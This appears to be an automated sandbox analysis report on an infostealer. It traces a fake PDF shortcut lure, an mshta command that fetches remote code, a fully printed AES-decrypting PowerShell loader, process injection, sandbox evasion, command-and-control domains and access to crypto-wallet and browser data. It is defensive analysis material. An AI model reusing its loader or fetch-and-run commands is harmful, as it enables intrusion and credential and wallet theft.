                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | File created: C:\Users\user\iScrPaint.exe
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | File created: C:\Users\user\WebUI.dll

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\UMFFWOGLBIB
                      Source: Possible double extension: pdf.lnk | Static PE information: Rechnung736258.pdf.lnk
                      Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR
Source: C:\Windows\SysWOW64\explorer.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\iScrPaint.exe | API/Special instruction interceptor: Address: 6BA47C44
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | API/Special instruction interceptor: Address: 6BA47C44
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | API/Special instruction interceptor: Address: 6BA47945
Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 6BA43B54
Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: CEA317
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1542
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4852
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4904
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\umffwoglbib
Source: C:\Windows\System32\mshta.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]
Source: C:\Users\user\iScrPaint.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_16-1529)
Source: C:\Users\user\iScrPaint.exe | API coverage: 0.0 %
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | API coverage: 0.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1856 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5548 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4084 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\explorer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,15_2_0040301A
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_00402B79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000015.00000003.2662930967.0000000005F34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677303242.000001BB90BC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2674922621.000001BB90BAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665496381.000001BB90BAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667650718.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.0
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000015.00000003.2662930967.0000000005F34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: mshta.exe, 00000005.00000003.2675113589.000001BB90BC1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: iScrPaint.exe, 00000011.00000002.2401973756.000000006B968000.00000008.00000001.01000000.00000014.sdmp | Binary or memory string: k.?AVQEmulationPaintEngine@@
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: mshta.exe, 00000005.00000002.2679004868.000001C393730000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: explorer.exe, 00000015.00000002.2840914690.000000000306C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: svchost.exe, 00000006.00000002.3281339549.000002085C22B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: iScrPaint.exe, 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmp | Binary or memory string: $l.?AVQEmulationPaintEngine@@
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mvmware
Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: iScrPaint.exe, iScrPaint.exe, 00000011.00000002.2401973756.000000006B968000.00000008.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr | Binary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
Source: C:\Users\user\iScrPaint.exe | Code function: 16_2_6C06B4E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C06B4E4
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,15_2_00406D5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Users\user\iScrPaint.exe | Code function: 16_2_6C06B4E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C06B4E4
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Code function: 17_2_6B6FB4E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6B6FB4E4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 104.21.16.1 443
Source: C:\Users\user\iScrPaint.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | NtQuerySystemInformation: Direct from: 0x6B968370
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | NtSetInformationThread: Direct from: 0x6B254C69
Source: C:\Users\user\iScrPaint.exe | NtQuerySystemInformation: Direct from: 0x6C2D8370
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | NtProtectVirtualMemory: Direct from: 0x6BA12B9A
Source: C:\Windows\SysWOW64\cmd.exe | Memory written: PID: 940 base: CE79C0 value: 55
Source: C:\Windows\SysWOW64\cmd.exe | Memory written: PID: 940 base: BCB008 value: 00
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
Source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: securesways.click
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: CE79C0
Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: BCB008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe "C:\Users\user\AppData\Roaming\TCUINOVJ.exe"
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Process created: C:\Users\user\iScrPaint.exe "C:\Users\user\iScrPaint.exe"
Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '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';function vyt ($ffwwz){return -split ($ffwwz -replace '..', '0x$& ')};$dhspomnm = vyt($ddg.substring(0, 2304));$pzg = [system.security.cryptography.aes]::create();$pzg.key = vyt($ddg.substring(2304));$pzg.iv = new-object byte[] 16;$dsnuqar = $pzg.createdecryptor();$vwahlx = [system.string]::new($dsnuqar.transformfinalblock($dhspomnm, 0,$dhspomnm.length)); sal fd $vwahlx.substring(3,3); fd $vwahlx.substring(6) (2 occurrences)
Source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp | Binary or memory string: ProgmanU
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_0040D72E cpuid 15_2_0040D72E
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,15_2_00401F9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (3 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (2 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_00401626
Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exe | Code function: 15_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,15_2_00404FAA
Source: C:\Windows\SysWOW64\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\explorer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
Source: explorer.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: explorer.exe | String found in binary or memory: ExodusWe
Source: explorer.exe, 00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
Source: explorer.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: explorer.exe, 00000015.00000003.2738829020.0000000003110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
